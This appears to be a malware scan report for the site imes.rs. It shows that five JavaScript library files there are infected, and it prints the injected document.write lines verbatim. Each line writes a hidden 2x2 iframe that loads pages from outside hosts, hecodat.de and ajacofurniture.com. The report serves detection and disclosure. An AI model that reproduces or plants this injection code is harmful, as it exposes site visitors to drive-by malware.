Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=imes.rs
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://imes.rs/ | 200 OK Content-Length: 13569 Content-Type: text/html | clean |
http://imes.rs/highslide/highslide.js | 200 OK Content-Length: 50652 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); if (!hs) { var hs = { lang : { cssDirection: 'ltr', loadingText : 'Loading...', loadingTitle : 'Click to cancel', focu } }); hs.addEventListener(window, 'resize', function() { hs.getPageSize(); }); hs.addEventListener(document, 'mousemove', function(e) { hs.mouse = { x: e.clientX, y: e.clientY }; }); hs.addEventListener(document, 'mousedown', hs.mouseClickHandler); hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(document, 'ready', hs.getAnchors); hs.addEventListener(window, 'load', hs.preloadImages); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> | ||
http://imes.rs/Scripts/swfobject_modified.js | 200 OK Content-Length: 22013 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHO var obj = getElementById(EXPRESS_INSTALL_ID); if (obj) { obj.parentNode.replaceChild(storedAltContent, obj); if (storedAltContentId) { setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> | ||
http://imes.rs/indexEng.php | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://imes.rs/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://imes.rs/proizvodi.php | 200 OK Content-Length: 12072 Content-Type: text/html | clean |
http://imes.rs/js/prototype.js | 200 OK Content-Length: 126450 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); var Prototype = { Version: '1.6.0.2', Browser: { IE: !!(window.attachEvent && !window.opera), Opera: add: function(classNameToAdd) { if (this.include(classNameToAdd)) return; this.set($A(this).concat(classNameToAdd).join(' ')); }, remove: function(classNameToRemove) { if (!this.include(classNameToRemove)) return; this.set($A(this).without(classNameToRemove).join(' ')); }, toString: function() { return $A(this).join(' '); } }; Object.extend(Element.ClassNames.prototype, Enumerable); Element.addMethods(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> | ||
http://imes.rs/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2972 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); var Scriptaculous = { Version: '1.8.1', require: function(libraryName) { document.write('<script type="text/javascr return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/)) }).each( function(s) { var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> | ||
http://imes.rs/js/lightbox.js | 200 OK Content-Length: 18707 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); LightboxOptions = Object.extend({ fileLoadingImage: 'images/loading.gif', fileBottomNavCloseImage: 'images/closela windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> | ||
http://imes.rs/sveze_meso.php | 200 OK Content-Length: 13603 Content-Type: text/html | clean |
http://imes.rs/images/sveze_meso.jpg | 200 OK Content-Length: 13267 Content-Type: image/jpeg | clean |
http://imes.rs/fermentisane_suve_kobasice.php | 200 OK Content-Length: 15112 Content-Type: text/html | clean |
http://imes.rs/images/fermentisane_suve_kobsasice.jpg | 200 OK Content-Length: 16898 Content-Type: image/jpeg | clean |
http://imes.rs/suhomesnati_proizvodi.php | 200 OK Content-Length: 13620 Content-Type: text/html | clean |
http://imes.rs/images/suhomesnati_proizvodi.jpg | 200 OK Content-Length: 19793 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: imes.rs
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 10 Sep 2014 10:40:18 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Died: timeout at scan.pm line 1546.
X-Powered-By: PHP/5.2.10
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: imes.rs
Referer: http://www.google.com/search?q=imes.rs
Result:
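The result is similar to the first query; no suspicious redirects were found. This check only compares how the home page responds with and without a search-engine Referer, so a clean result here does not contradict the findings above: the five JavaScript files flagged under "Scanned pages/files" each begin with the same two injected document.write lines, which write the hidden 2x2 iframes into any page that loads those scripts. The X-Died: timeout header in the first response appears to have been added by the scanner's own HTTP client rather than by the server, which would mean the fetch timed out and the comparison may rest on a partial response.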